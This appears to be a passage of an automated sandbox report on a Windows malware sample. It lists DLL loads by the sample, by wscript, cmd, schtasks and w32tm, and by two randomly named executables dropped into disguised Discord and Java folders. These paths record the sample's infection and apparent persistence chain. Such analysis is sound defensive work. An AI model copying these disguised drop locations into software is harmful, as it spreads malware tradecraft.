                                    Source: C:\Users\user\Desktop\1znAXdPcM5.exeSection loaded: dwmapi.dllJump to behavior
                                    Source: C:\Users\user\Desktop\1znAXdPcM5.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Users\user\Desktop\1znAXdPcM5.exeSection loaded: riched20.dllJump to behavior
                                    Source: C:\Users\user\Desktop\1znAXdPcM5.exeSection loaded: usp10.dllJump to behavior
                                    Source: C:\Users\user\Desktop\1znAXdPcM5.exeSection loaded: msls31.dllJump to behavior
                                    Source: C:\Users\user\Desktop\1znAXdPcM5.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Users\user\Desktop\1znAXdPcM5.exeSection loaded: windowscodecs.dllJump to behavior
                                    Source: C:\Users\user\Desktop\1znAXdPcM5.exeSection loaded: textshaping.dllJump to behavior
                                    Source: C:\Users\user\Desktop\1znAXdPcM5.exeSection loaded: textinputframework.dllJump to behavior
                                    Source: C:\Users\user\Desktop\1znAXdPcM5.exeSection loaded: coreuicomponents.dllJump to behavior
                                    Source: C:\Users\user\Desktop\1znAXdPcM5.exeSection loaded: coremessaging.dllJump to behavior
                                    Source: C:\Users\user\Desktop\1znAXdPcM5.exeSection loaded: ntmarta.dllJump to behavior
                                    Source: C:\Users\user\Desktop\1znAXdPcM5.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Users\user\Desktop\1znAXdPcM5.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Users\user\Desktop\1znAXdPcM5.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Users\user\Desktop\1znAXdPcM5.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\Users\user\Desktop\1znAXdPcM5.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\Users\user\Desktop\1znAXdPcM5.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\Users\user\Desktop\1znAXdPcM5.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\Users\user\Desktop\1znAXdPcM5.exeSection loaded: edputil.dllJump to behavior
                                    Source: C:\Users\user\Desktop\1znAXdPcM5.exeSection loaded: urlmon.dllJump to behavior
                                    Source: C:\Users\user\Desktop\1znAXdPcM5.exeSection loaded: iertutil.dllJump to behavior
                                    Source: C:\Users\user\Desktop\1znAXdPcM5.exeSection loaded: srvcli.dllJump to behavior
                                    Source: C:\Users\user\Desktop\1znAXdPcM5.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\Users\user\Desktop\1znAXdPcM5.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                    Source: C:\Users\user\Desktop\1znAXdPcM5.exeSection loaded: policymanager.dllJump to behavior
                                    Source: C:\Users\user\Desktop\1znAXdPcM5.exeSection loaded: msvcp110_win.dllJump to behavior
                                    Source: C:\Users\user\Desktop\1znAXdPcM5.exeSection loaded: appresolver.dllJump to behavior
                                    Source: C:\Users\user\Desktop\1znAXdPcM5.exeSection loaded: bcp47langs.dllJump to behavior
                                    Source: C:\Users\user\Desktop\1znAXdPcM5.exeSection loaded: slc.dllJump to behavior
                                    Source: C:\Users\user\Desktop\1znAXdPcM5.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\Users\user\Desktop\1znAXdPcM5.exeSection loaded: sppc.dllJump to behavior
                                    Source: C:\Users\user\Desktop\1znAXdPcM5.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                    Source: C:\Users\user\Desktop\1znAXdPcM5.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                    Source: C:\Users\user\Desktop\1znAXdPcM5.exeSection loaded: pcacli.dllJump to behavior
                                    Source: C:\Users\user\Desktop\1znAXdPcM5.exeSection loaded: mpr.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: apphelp.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dlnashext.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wpdshext.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeSection loaded: mscoree.dllJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeSection loaded: apphelp.dllJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeSection loaded: version.dllJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeSection loaded: ktmw32.dllJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeSection loaded: ntmarta.dllJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeSection loaded: wbemcomn.dllJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeSection loaded: amsi.dllJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeSection loaded: dlnashext.dllJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeSection loaded: wpdshext.dllJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeSection loaded: edputil.dllJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeSection loaded: urlmon.dllJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeSection loaded: iertutil.dllJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeSection loaded: srvcli.dllJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeSection loaded: appresolver.dllJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeSection loaded: bcp47langs.dllJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeSection loaded: slc.dllJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeSection loaded: sppc.dllJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                    Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                                    Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dllJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeSection loaded: mscoree.dllJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeSection loaded: version.dllJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeSection loaded: mscoree.dll
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeSection loaded: version.dll
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeSection loaded: uxtheme.dll
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeSection loaded: windows.storage.dll
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeSection loaded: wldp.dll
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeSection loaded: profapi.dll
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeSection loaded: cryptsp.dll
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeSection loaded: rsaenh.dll
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeSection loaded: cryptbase.dll
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
                                    Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeSection loaded: mscoree.dll
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeSection loaded: apphelp.dll
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeSection loaded: version.dll
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeSection loaded: uxtheme.dll
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeSection loaded: windows.storage.dll
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeSection loaded: wldp.dll
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeSection loaded: profapi.dll
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeSection loaded: cryptsp.dll
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeSection loaded: rsaenh.dll
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeSection loaded: cryptbase.dll
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: iphlpapi.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: logoncli.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: netutils.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: ntmarta.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: ntdsapi.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: mswsock.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: dnsapi.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: rasadhlp.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: fwpuclnt.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeSection loaded: mscoree.dll
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeSection loaded: version.dll
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeSection loaded: uxtheme.dll
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeSection loaded: windows.storage.dll
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeSection loaded: wldp.dll
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeSection loaded: profapi.dll
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeSection loaded: cryptsp.dll
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeSection loaded: rsaenh.dll
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeSection loaded: cryptbase.dll
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeSection loaded: sspicli.dll
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeSection loaded: ktmw32.dll
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeSection loaded: rasapi32.dll
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeSection loaded: rasman.dll
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeSection loaded: rtutils.dll
